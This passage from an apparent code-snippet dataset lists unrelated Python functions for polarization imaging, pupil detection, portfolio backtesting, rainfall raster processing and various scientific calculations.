I.shape[2]))\n l = 0\n for i in range(I.shape[1]):\n for j in range(I.shape[2]):\n #if np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j]) > 1:\n #l += 1\n if Stokes[0, i, j] == 0:\n Stokes[0, i, j] = 1\n DOP[i, j] = np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j])\n #rho[i, j] = np.divide(np.sqrt(np.square(Stokes[2, i, j]) + np.square(Stokes[1, i, j])), Stokes[0, i, j])\n \"\"\"if DOP[i, j] == 0:\n equal_i.append([I[0, i, j], I[1, i, j], I[2, i, j], I[3, i, j]])\"\"\"\n\n #rho_one.append(l)\n\n DOP = DOP / np.max(DOP) * 255\n #rho = rho\n\n \"\"\"im_cos = rho * np.cos(2*phi)\n im_cos = im_cos / np.max(im_cos) * 255\n im_sin = rho * np.sin(2*phi)\n im_sin = im_sin / np.max(im_sin) * 255\n\n # Saving the image in the format DOP*sin(AOP) and DOP*cos(AOP)\n\n if not os.path.exists(path_process + \"Cos/\"):\n os.mkdir(path_process + \"Cos/\")\n imageio.imwrite(path_process + \"Cos/\" + imgs_polar[k].split(\".\")[0] + \"_cos.png\", im_cos)\n if not os.path.exists(path_process + \"Sin/\"):\n os.mkdir(path_process + \"Sin/\")\n imageio.imwrite(path_process + \"Sin/\" + imgs_polar[k].split(\".\")[0] + \"_sin.png\", im_sin)\"\"\"\n\n # Saving the AOP and DOP\n\n if not os.path.exists(path_process + \"AOP/\"):\n os.mkdir(path_process + \"AOP/\")\n imageio.imwrite(path_process + \"AOP/\" + imgs_polar[k].split(\".\")[0] + \"_AOP.png\", AOP)\n if not os.path.exists(path_process + \"DOP/\"):\n os.mkdir(path_process + \"DOP/\")\n imageio.imwrite(path_process + \"DOP/\" + 
imgs_polar[k].split(\".\")[0] + \"_DOP.png\", DOP)\n\n #AOP.astype(int)\n #DOP.astype(int)\n\n return AOP, DOP#, im_cos, im_sin, rho, phi", "def getPupil(self, image, threshold=0, pupilMinimum=10, pupilMaximum=50):\n # Create the output variable.\n bestPupil = -1\n bestProps = {}\n ellipses = []\n centers = []\n\n # Create variables to plot the regression data.\n # TIPS: You must select two blob properties and add their values in\n # the following lists. Then, call the private method\n # __plotData() in the end of your implementation.\n x = []\n y = []\n\n # Grayscale image.\n grayscale = image.copy()\n if len(grayscale.shape) == 3:\n grayscale = cv2.cvtColor(grayscale, cv2.COLOR_BGR2GRAY)\n\n # Define the minimum and maximum size of the detected blob.\n pupilMinimum = int(round(math.pi * math.pow(pupilMinimum, 2)))\n pupilMaximum = int(round(math.pi * math.pow(pupilMaximum, 2)))\n\n \n # Preprocessing\n #kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(7,7))\n #grayscale = cv2.morphologyEx(grayscale, cv2.MORPH_OPEN, kernel)\n \n #kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(15,15))\n #grayscale = cv2.morphologyEx(grayscale, cv2.MORPH_CLOSE, kernel) \n \n # Create a binary image.\n _, thres = cv2.threshold(grayscale, threshold, 255,\n cv2.THRESH_BINARY_INV)\n #thres = self.__GetAutoThresholdPupil(grayscale)\n \n #print thres\n # Find blobs in the input image.\n _, contours, hierarchy = cv2.findContours(thres, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n\n #<!--------------------------------------------------------------------------->\n #<!-- YOUR CODE HERE -->\n #<!--------------------------------------------------------------------------->\n for blob in contours:\n props = self.Props.calcContourProperties(blob,[\"centroid\", \"area\", \"extend\", \"circularity\",\"compactness\",\"epr\"]) \n # Is candidate\n if 500.0 < props[\"Area\"] and props[\"Area\"] < 8000.0 and 0.65 < props[\"Extend\"] and props[\"Extend\"] < 0.9: \n centers.append(props[\"Centroid\"])\n if len(blob) > 4:\n ellipses.append(cv2.fitEllipse(blob))\n x.append(props[\"Area\"])\n y.append(props[\"Extend\"]) \n else:\n ellipses.append(cv2.minAreaRect(blob))\n x.append(props[\"Area\"])\n y.append(props[\"Extend\"])\n compactnessRatio = props[\"Compactness\"]\n epr = props [\"Epr\"]\n \n print props[\"Circularity\"]\n \n if props[\"Circularity\"] > 0.5 and compactnessRatio>0.5 and epr>0.5:\n # Update best props \n if bestPupil == -1:\n bestProps = props \n bestPupil = len(ellipses) - 1 \n else: \n if props[\"Circularity\"] > bestProps[\"Circularity\"]:\n bestProps = props \n bestPupil = len(ellipses) - 1 \n\n # Return the final result.\n return ellipses, centers, bestPupil", "def curve_with_hillcoef(ph, pka, hillcoef):\n# return hillcoef * ph - pka\n return 1/(1+10**(hillcoef*(pka-ph)))", "def bern_max_metric(pipe_diameter, delta_p):\n\n rho = 1000 # density of water kg/m^3\n flow_rate_max = ((math.pi * (pipe_diameter**2)) / 4) * math.sqrt((2 * delta_p) / rho)\n\n return flow_rate_max", "def cppi(risky_r, safe_r=None, m=3, start=initial, floor=0.8, riskfree_rate=risk_free_rate, drawdown=None):\n # set up the CPPI parameters\n dates = risky_r.index\n n_steps = len(dates)\n account_value = start\n floor_value = start*floor\n peak = account_value\n if isinstance(risky_r, pd.Series): \n risky_r = pd.DataFrame(risky_r, columns=[\"R\"])\n\n if safe_r is None:\n safe_r = pd.DataFrame().reindex_like(risky_r)\n safe_r.values[:] = riskfree_rate/12 # fast way to set all values to a number\n # set up some DataFrames for saving 
intermediate values\n account_history = pd.DataFrame().reindex_like(risky_r)\n risky_w_history = pd.DataFrame().reindex_like(risky_r)\n cushion_history = pd.DataFrame().reindex_like(risky_r)\n floorval_history = pd.DataFrame().reindex_like(risky_r)\n peak_history = pd.DataFrame().reindex_like(risky_r)\n\n for step in range(n_steps):\n if drawdown is not None:\n peak = np.maximum(peak, account_value)\n floor_value = peak*(1-drawdown)\n cushion = (account_value - floor_value)/account_value\n risky_w = m*cushion\n risky_w = np.minimum(risky_w, 1)\n risky_w = np.maximum(risky_w, 0)\n safe_w = 1-risky_w\n risky_alloc = account_value*risky_w\n safe_alloc = account_value*safe_w\n # recompute the new account value at the end of this step\n account_value = risky_alloc*(1+risky_r.iloc[step]) + safe_alloc*(1+safe_r.iloc[step])\n # save the histories for analysis and plotting\n cushion_history.iloc[step] = cushion\n risky_w_history.iloc[step] = risky_w\n account_history.iloc[step] = account_value\n floorval_history.iloc[step] = floor_value\n peak_history.iloc[step] = peak\n risky_wealth = start*(1+risky_r).cumprod()\n backtest_result = {\n \"Wealth\": account_history,\n \"Risky Wealth\": risky_wealth, \n \"Risk Budget\": cushion_history,\n \"Risky Allocation\": risky_w_history,\n \"m\": m,\n \"start\": start,\n \"floor\": floor,\n \"risky_r\":risky_r,\n \"safe_r\": safe_r,\n \"drawdown\": drawdown,\n \"peak\": peak_history,\n \"floor\": floorval_history\n }\n return backtest_result", "def get_mortality_rate(period, species):\n\n initial_value = 0.05\n mortality_decrease_rate = 0.97 # 0.97 ^ 50 .==' 0.218\n r = initial_value * (mortality_decrease_rate ** period)\n return 1 - r", "def workflow(now, realtime):\n szx = 7000\n szy = 3500\n # Create the image data\n imgdata = np.zeros((szy, szx), 'u1')\n sts = now - datetime.timedelta(minutes=2)\n metadata = {'start_valid': sts.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'end_valid': now.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n 'product': 'a2m',\n 'units': '0.02 mm'}\n\n gribfn = mrms.fetch('PrecipRate', now)\n if gribfn is None:\n print((\"mrms_rainrate_comp.py NODATA for PrecipRate: %s\"\n ) % (now.strftime(\"%Y-%m-%dT%H:%MZ\"),))\n return\n\n # http://www.nssl.noaa.gov/projects/mrms/operational/tables.php\n # Says units are mm/hr\n fp = gzip.GzipFile(gribfn, 'rb')\n (_, tmpfn) = tempfile.mkstemp()\n tmpfp = open(tmpfn, 'wb')\n tmpfp.write(fp.read())\n tmpfp.close()\n grbs = pygrib.open(tmpfn)\n grb = grbs[1]\n os.unlink(tmpfn)\n os.unlink(gribfn)\n\n val = grb['values']\n # Convert into units of 0.1 mm accumulation\n val = val / 60.0 * 2.0 * 50.0\n val = np.where(val < 0., 255., val)\n imgdata[:, :] = np.flipud(val.astype('int'))\n\n (tmpfp, tmpfn) = tempfile.mkstemp()\n\n # Create Image\n png = Image.fromarray(np.flipud(imgdata))\n png.putpalette(mrms.make_colorramp())\n png.save('%s.png' % (tmpfn,))\n\n mrms.write_worldfile('%s.wld' % (tmpfn,))\n # Inject WLD file\n routes = \"c\" if realtime else \"\"\n prefix = 'a2m'\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot a%s %s \"\n \"gis/images/4326/mrms/%s.wld GIS/mrms/%s_%s.wld wld' %s.wld\"\n \"\") % (routes, now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n # Now we inject into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot a%s %s \"\n \"gis/images/4326/mrms/%s.png GIS/mrms/%s_%s.png png' %s.png\"\n \"\") % (routes, now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, 
shell=True)\n\n if realtime:\n # Create 900913 image\n cmd = (\"gdalwarp -s_srs EPSG:4326 -t_srs EPSG:3857 -q -of GTiff \"\n \"-tr 1000.0 1000.0 %s.png %s.tif\") % (tmpfn, tmpfn)\n subprocess.call(cmd, shell=True)\n # Insert into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot c %s \"\n \"gis/images/900913/mrms/%s.tif GIS/mrms/%s_%s.tif tif' %s.tif\"\n \"\") % (now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n\n j = open(\"%s.json\" % (tmpfn,), 'w')\n j.write(json.dumps(dict(meta=metadata)))\n j.close()\n # Insert into LDM\n pqstr = (\"/home/ldm/bin/pqinsert -i -p 'plot c %s \"\n \"gis/images/4326/mrms/%s.json GIS/mrms/%s_%s.json json' \"\n \"%s.json\") % (now.strftime(\"%Y%m%d%H%M\"), prefix, prefix,\n now.strftime(\"%Y%m%d%H%M\"), tmpfn)\n subprocess.call(pqstr, shell=True)\n for suffix in ['tif', 'json', 'png', 'wld']:\n if os.path.isfile(\"%s.%s\" % (tmpfn, suffix)):\n os.unlink('%s.%s' % (tmpfn, suffix))\n\n os.close(tmpfp)\n os.unlink(tmpfn)", "def beamarea_pix(self):\n beamsigma1 = self.header['BMAJ'] / self.wcs.wcs.cdelt[0]\n beamsigma2 = self.header['BMIN'] / self.wcs.wcs.cdelt[0]\n return (np.pi * beamsigma1 * beamsigma2) / (4 * np.log(2))", "def buldge_disk_ratio(kwargs_buldge_disk):\n kwargs_bd = copy.deepcopy(kwargs_buldge_disk)\n kwargs_bd['center_x'] = 0\n kwargs_bd['center_y'] = 0\n deltaPix = 0.05\n numPix = 200\n x_grid, y_grid = util.make_grid(numPix, deltaPix)\n from lenstronomy.LightModel.Profiles.sersic import BuldgeDisk\n bd_class = BuldgeDisk()\n light_grid = bd_class.function(x_grid, y_grid, **kwargs_bd)\n light_tot = np.sum(light_grid)\n kwargs_bd['I0_d'] = 0\n light_grid = bd_class.function(x_grid, y_grid, **kwargs_bd)\n light_buldge = np.sum(light_grid)\n return light_tot, light_buldge", "def _calculate_tail_probability(self, x, rate):\n return 1 - stats.poisson.cdf(x - 1, rate)", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def Ag_density():\n # initialise no infection default for the number of infections required\n agcurves = [np.zeros(cf.endtime + 1) for inf in cf.tinf]\n # for every infection, calculate its individual effect per timepoint\n for i in range(len(cf.tinf)):\n pag = cf.dose[i] # peak\n tai = 0 # tnow after infection\n while pag > 0.01:\n pag = cf.dose[i] * math.exp(-float(tai) / cf.tdecay)\n agcurves[i][cf.tinf[i] + tai] = pag\n tai += 1\n if cf.tinf[i] + tai >= cf.endtime:\n break\n # sum up all effects\n agcurve_uncapped = np.sum(agcurves, axis=0)\n # set all values above 100% to 100%\n agcurve = [np.min([val, 1]) for val in agcurve_uncapped]\n\n return agcurve", "def curve_no_hillcoef(ph, pka):\n# return ph - pka\n return 1/(10**(pka-ph)+1)", "def _prorata_rate(self, days_used, days_in_month):\n return (100 * days_used // days_in_month) / 100.0", "def estimate_arpu(x):\n arpu = 0\n if x['mean_luminosity_km2'] > 5:\n # #10 year time horizon\n # for i in range(0, 10):\n # #discounted_arpu = 
(arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (20*12) / (1 + 0.03) ** i\n # )\n return 20 * 12 * 10#arpu\n elif x['mean_luminosity_km2'] > 1:\n # for i in range(0, 10):\n # #discounted_arpu = (arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (5*12) / (1 + 0.03) ** i\n # )\n return 5 * 12 * 10#arpu\n else:\n # for i in range(0, 10):\n # #discounted_arpu = (arpu*months) / (1 + discount_rate) ** year\n # arpu += (\n # (2*12) / (1 + 0.03) ** i\n # )\n return 2 * 12 * 10#arpu", "def deadPointAdd(self, materials, materialNumber, ratioArray):\t\n\t\t\n\t\t\"\"\"sort the ratio arry in order\"\"\"\n\t\tsorted(ratioArray)\n\t\t\n\t\t\"\"\"find the jumpping bound\"\"\"\n\t\tboundRatio = []\n\t\tboundRatio.append(0.0)\n\t\tfor ratio in ratioArray:\n\t\t\tboundRatio.append((ratio[0] + ratio[1]) / 2.0 / 100.0)\n\t\tboundRatio.append(1.0)\n\t\t\n\t\t\"\"\"add the beginning and finishing part in functionRatio, and put ratioArray in it\"\"\"\n\t\tlowestBound = ratioArray[0][0]\n\t\tupperestBound = ratioArray[-1][1]\n\t\t\n\t\tfunctionRatio = []\n\t\tfunctionRatio.append((0, lowestBound / 100.0))\n\t\tfor i in range(len(ratioArray) - 1):\n\t\t\tfunctionRatio.append((ratioArray[i][1] / 100.0, ratioArray[i + 1][0] / 100.0))\n\t\tfunctionRatio.append((upperestBound, 100))\n\t\t\t\n\t\t\"\"\"\"define function for each area, calculate k(gradience) and b\"\"\"\n\t\tlinearGradient = []\n\t\tlinearOffset = []\n\t\tfor i in range(len(boundRatio) - 1):\n\t\t\tx1 = boundRatio[i]\n\t\t\tx2 = boundRatio[i + 1]\n\t\t\ty1 = functionRatio[i][0]\n\t\t\ty2 = functionRatio[i][1]\n\t\t\tlinearGradient.append((y2 - y1) / (x2 - x1))\n\t\t\tlinearOffset.append((y1 * x2 - y2 * x1) / (x2 - x1))\n\t\t\t\n\t\t\"\"\"calculate the actual composition using the linear map\"\"\"\n\t\tvolumeShape = self.volumeComposition[materialNumber].shape\n\t\tfor i in range(volumeShape[0]):\n\t\t\tfor j in range(volumeShape[1]):\n\t\t\t\tfor k in range(volumeShape[2]):\n\t\t\t\t\tfor l in range(len(boundRatio) - 1):\n\t\t\t\t\t\tif self.volumeComposition[materialNumber][i][j][k] > 0.00001 + boundRatio[l] and self.volumeComposition[materialNumber][i][j][k] <= + boundRatio[l + 1]:\n\t\t\t\t\t\t\t\"\"\"\"apply the linear function\"\"\"\t\n\t\t\t\t\t\t\tself.volumeComposition[materialNumber][i][j][k] = linearGradient[l] * self.volumeComposition[materialNumber][i][j][k] + linearOffset[l]\n\t\t\t\t\t\t\tself.volumeComposition[0][i][j][k] = 1.0 - self.volumeComposition[materialNumber][i][j][k]\n\n\t\t\"\"\"convert volumeComposition into RGB\"\"\"\t\t\t\t\t\t\n\t\tlayersR = list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tvolumeGeneral = list()\n\t\t\n\t\tlayNumber = -1\n\t\tfor i in self.slicePoints:\n\t\t\tlayNumber += 1\n\t\t\tboolResult2 = self.voxel_slice(i, self.vertices, self.triangles, self.res, self.llc, self.sliceProto, 2)\n\t\t\tprint boolResult2.shape\n\t\t\ttupleResultR = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(boolResult2.shape, dtype=uint8)\n\t\t\t#tupleMaterial = numpy.zeros(boolResult2.shape, dtype=f)\n\t\t\t#lines=self.findSelectedContour(self.vertices,triangleSelected,i ,numpy.array([0,0,1]))\n\t\t\t#boolResult1 = self.findVoxelOfSelectedContour(i, lines, self.res, self.llc, self.sliceProto, depth)\n\t\t\tj = numpy.nditer(boolResult2, flags=['multi_index'], op_flags=['readwrite'])\n\n\t\t\twhile not j.finished:\t\n\t\t\t\tprint type(j.multi_index)\n\t\t\t\tprint j.multi_index\n\t\t\t\tif j[0] == 
True:\n\t\t\t\t\tfor l in range(len(self.volumeComposition)):\n\t\t\t\t\t\ttupleResultB[j.multi_index] += materials[l].materialColor[0] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\t\t\ttupleResultG[j.multi_index] += materials[l].materialColor[1] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\t\t\ttupleResultR[j.multi_index] += materials[l].materialColor[2] * self.volumeComposition[l][layNumber][j.multi_index]\n\t\t\t\telse:\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\tj.iternext()\t\t\t\t\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\t\t\n\t\tprint \"i got here\"\n\t\tself.volumeR=numpy.array(layersR) # create the 3d volume\n\t\tself.volumeG=numpy.array(layersG) \n\t\tself.volumeB=numpy.array(layersB)\n\n\t\tvolumeGeneral.append(self.volumeR)\n\t\tvolumeGeneral.append(self.volumeG)\n\t\tvolumeGeneral.append(self.volumeB)\n\t\t\n\t\treturn volumeGeneral", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: {:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def density_by_ideal_gas_law(\n p: tf.Tensor,\n r: tf.Tensor,\n t: tf.Tensor,\n ) -> tf.Tensor:\n return p / r / t", "def coverage_metrics(area_map, path):\n path = np.array(path).T\n assert path.shape[0] == 2\n x, y = path\n\n \"\"\"\n calculates the distance to travel by the drone\n \"\"\"\n traveled = 0\n angle = 0\n curves = 0\n\n for m in range(len(x)-1):\n traveled += math.sqrt(math.pow(x[m]-x[m+1], 2) + math.pow(y[m]-y[m+1], 2))\n\n \"\"\"\n for n in range(len(x)-2):\n m1 = (y[n+1]-y[n])/(x[n+1]-x[n])\n m2 = (y[n+2]-y[n+1])/(x[n+2]-x[n+1])\n res = m1*m2\n a = np.array([x[n], y[n]])\n b = np.array([x[n+1], y[n+1]])\n c = np.array([x[n + 2], y[n + 2]])\n if res != 0:\n curves +=1\n \"\"\"\n\n\n\n p_len = path.shape[1]\n obs_map = area_map == -1\n obs_points = obs_map.sum()\n total_points_nobs = (~obs_map).sum()\n\n vis_map = obs_map.copy()\n vis_map[x, y] = True\n vis_points = vis_map.sum() - obs_points\n\n coverage = vis_points / total_points_nobs\n redundancy = p_len / vis_points - 1\n\n return {\n \"points_to_visit\": total_points_nobs,\n \"obstacle_points\": obs_points,\n \"points_visited\": vis_points,\n \"coverage_path_len\": p_len,\n 
\"coverage\": coverage,\n \"redundancy\": redundancy,\n \"area_shape\": area_map.shape,\n \"distance to travel\": traveled,\n \"total curves\": curves\n }", "def growth_curve(userinputs, filter, catalog):\n logging.info('Running growth curve analysis on {}'.format(catalog))\n # Load the photometry results from the catalog (that is returned by the phot\n # function)\n aper_st, flux_st = np.loadtxt(catalog, unpack=True, usecols=(0,3))\n\n #Growth curve is only done on the ref image so we get the filter from userinp.\n ref_filter = filter\n\n ratio_st = np.empty(len(aper_st))\n\n #number of apertures\n naper = 20\n\n # Calculate the number of stars, make sure it is an integer\n nstar = int(len(aper_st)/naper)\n logging.info('Number of stars used: {}'.format(nstar))\n aper_ind = naper - 1\n\n for k in range(nstar):\n\n for i in range(naper):\n\n ratio_st[i + k*naper] = flux_st[i + k*naper]/flux_st[aper_ind + k*naper]\n\n\n # Find median ratio at each aperture between all the stars and all the clusters\n med_st = np.empty(naper)\n\n for i in range(naper):\n\n med_st[i] = np.median(ratio_st[i::naper])\n\n\n # Plot growth curves\n logging.info('Creating Growth curve plots')\n fig = plt.figure(figsize = (7,7))\n\n aper_x = np.arange(naper) + 1\n\n for i in range(nstar):\n\n ratio_y = ratio_st[i*naper:(i + 1)*naper]\n plt.plot(aper_x, ratio_y, 'y-')\n plt.annotate(str(i + 1), xy=(8.0, ratio_y[7]),\n horizontalalignment='left', verticalalignment='top', fontsize=6)\n\n\n plt.plot(aper_x, med_st, 'r-' , linewidth=4.0)\n plt.hlines(0.5, 0, 20, color='black', linewidth=2, zorder=10)\n plt.vlines(4, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n plt.vlines(5, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n plt.vlines(6, 0, 1.1, color='black', linewidth=2, linestyle='dashed', zorder=10)\n\n plt.ylabel('Normalized Flux ' + ref_filter.upper())\n plt.xlabel('Radius (pix)')\n plt.xlim(1,20)\n plt.minorticks_on()\n\n fig.savefig(userinputs['OUTDIR'] + '/plots/plot_growth_curve_{}.pdf'.format(ref_filter))", "def rPVI(durations):\n if not durations:\n sys.exit(\"Empty durations. 
Exit!\")\n s = []\n for idx in range(1,len(durations)):\n s.append(float(durations[idx-1]-durations[idx]))\n\n return np.sum(np.abs(s)) / (len(durations)-1)", "def marc_surr(x):\n# h = thickness = [60,105]\n# a = obliquity = [0,30]\n# v = speed = [2.1,2.8]\n h = x[0] * 25.4 * 1e-3\n a = x[1] * pi/180.0\n v = x[2]\n\n K = 10.3963\n p = 0.4757\n u = 1.0275\n m = 0.4682\n Dp = 1.778\n\n # compare to ballistic limit\n v_bl = ballistic_limit(h,a)\n if v < v_bl:\n return 0\n\n return K * (h/Dp)**p * (cos(a))**u * (tanh((v/v_bl)-1))**m", "def DR(R,Pc):\n return r1*R*(K1**B1/(K1**B1 + (A/R)**B1))*(S/(S + R*Pc + Pc)) \\\n - gwt*A - r2*R*(K2**B2/(K2**B2 + (A)**B2))*(S/(S + R*Pc + Pc) ) \\\n *(R*M)/(K3 + R*M) + R*gc", "def pulsewidth2pct(pw): \n shifted = pw - 500.0\n scaled = shifted / 2000.0 * 100.0\n pct = scaled\n return pct", "def getReciproque(self):\n return lambda y: (y - self.ordinate) / self.slope", "def Fault_geom_PR(strike, dip, rake, az):\n delta = np.deg2rad(dip)\n lambd = np.deg2rad(rake)\n\n phi_az = np.deg2rad(strike - az)\n\n PR = np.cos(lambd) * np.sin(delta) * np.sin(2 * phi_az) - np.sin(lambd) * np.sin(\n delta\n ) * np.cos(delta) * np.cos(2 * phi_az)\n return PR", "def workflow(save_dir):\n year = 2016\n month_series = range(1, 13)\n total_potential_biomass_multiplier = 48.8\n total_standing_biomass_multiplier = 45.25\n biomass_jitter = 3.\n diet_sufficiency_multiplier = 0.28\n diet_sufficiency_jitter = 0.01\n avg_animal_density = 0.0175\n animal_density_jitter = 0.005\n\n # twelve months of precipitation rasters covering the study area\n precip_basename_list = [\n 'chirps-v2.0.{}.{:02d}.tif'.format(year, month) for month in\n month_series]\n\n # reclassify 0 to NoData in CHIRPS rasters\n output_precip_dir = os.path.join(save_dir, 'precip')\n if not os.path.exists(output_precip_dir):\n os.makedirs(output_precip_dir)\n for bn in precip_basename_list:\n base_raster = os.path.join(PRECIP_DIR, bn)\n target_raster = os.path.join(output_precip_dir, bn)\n pygeoprocessing.raster_calculator(\n [(base_raster, 1)], zero_to_nodata, target_raster,\n gdal.GDT_Float32, _IC_NODATA)\n\n # generate outputs\n for month in month_series:\n precip_raster = os.path.join(\n output_precip_dir, 'chirps-v2.0.{}.{:02d}.tif'.format(year, month))\n\n total_potential_biomass_path = os.path.join(\n save_dir, 'potential_biomass_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n total_potential_biomass_multiplier,\n biomass_jitter]],\n precip_to_correlated_output, total_potential_biomass_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n total_standing_biomass_path = os.path.join(\n save_dir, 'standing_biomass_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n total_standing_biomass_multiplier,\n biomass_jitter]],\n precip_to_correlated_output, total_standing_biomass_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n diet_sufficiency_path = os.path.join(\n save_dir, 'diet_sufficiency_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n diet_sufficiency_multiplier,\n diet_sufficiency_jitter]],\n precip_to_correlated_output, diet_sufficiency_path,\n gdal.GDT_Float32, _IC_NODATA)\n\n animal_density_path = os.path.join(\n save_dir, 'animal_density_{}_{:02d}.tif'.format(year, month))\n pygeoprocessing.raster_calculator(\n [(precip_raster, 1)] + [(path, 'raw') for path in [\n avg_animal_density,\n 
animal_density_jitter]],\n precip_to_animal_density, animal_density_path,\n gdal.GDT_Float32, _IC_NODATA)", "def measure(self, imgage, previous=None):", "def gen_null_seascape(pop,conc,method='curve_fit'):\n if method == 'curve_fit':\n if pop.fitness_data == 'estimate':\n hc = 0\n for key in pop.seascape_library.keys():\n hc += pop.seascape_library[key]['hill_coeff']\n hc = hc/(len(pop.seascape_library.keys()))\n\n landscape = gen_fit_land(pop,conc,hc=hc)\n start_rates = gen_fit_land(pop,10**-3,hc=hc)\n final_rates = gen_fit_land(pop,10**5,hc=hc)\n\n else:\n landscape = gen_fit_land(pop,conc)\n start_rates = gen_fit_land(pop,10**-3)\n final_rates = gen_fit_land(pop,10**5)\n # mid_rates = gen_fit_land(pop,10**1)\n \n # print(landscape)\n start_points = scale_and_ignore_zeros(landscape,start_rates)\n end_points = scale_and_ignore_zeros(landscape,final_rates)\n # mid_points = scale_and_ignore_zeros(landscape,mid_rates)\n mid_points = landscape\n \n xdata = [10**-3,conc,10**5]\n \n ic50_new = []\n drugless_rates_new = []\n\n # fig,ax = plt.subplots()\n \n for genotype in range(len(landscape)):\n\n ydata = [start_points[genotype],\n mid_points[genotype],\n end_points[genotype]]\n \n # ax.scatter(xdata,ydata,label=str(genotype))\n\n params = fit_logistic_curve(xdata,ydata)\n ic50_new.append(params[1])\n drugless_rates_new.append(params[0])\n # find the null landscape drugless rates\n # ax.set_xscale('log')\n # ax.legend()\n drugless_rates_new = scale_and_ignore_zeros(drugless_rates_new,\n pop.drugless_rates)\n\n # fix the fact that genotype 3 in ogbunugafor data has zero fitness\n if hasattr(pop,'ic50_data'):\n if pop.ic50_data[-22:] == 'pyrimethamine_ic50.csv':\n ic50_new[3] = 0\n drugless_rates_new[3] = 0\n \n elif method == 'sort':\n \n landscape = gen_fit_land(pop,conc)\n \n dr = np.array(pop.drugless_rates)\n ic50 = np.array(pop.ic50)\n \n landscape_t = landscape.argsort()\n landscape_ranks = np.empty_like(landscape_t)\n landscape_ranks[landscape_t] = np.arange(len(landscape))\n\n ic50_t = ic50.argsort()\n ic50_ranks = np.empty_like(ic50_t)\n ic50_ranks[ic50_t] = np.arange(len(ic50))\n\n dr_t = dr.argsort()\n dr_ranks = np.empty_like(dr_t)\n dr_ranks[dr_t] = np.arange(len(dr))\n\n ic50_new = np.zeros(len(landscape))\n drugless_rates_new = np.zeros(len(landscape))\n k = 0\n for g in landscape_ranks:\n indx = np.argwhere(ic50_ranks==g)\n indx = indx[0][0]\n ic50_new[k] = 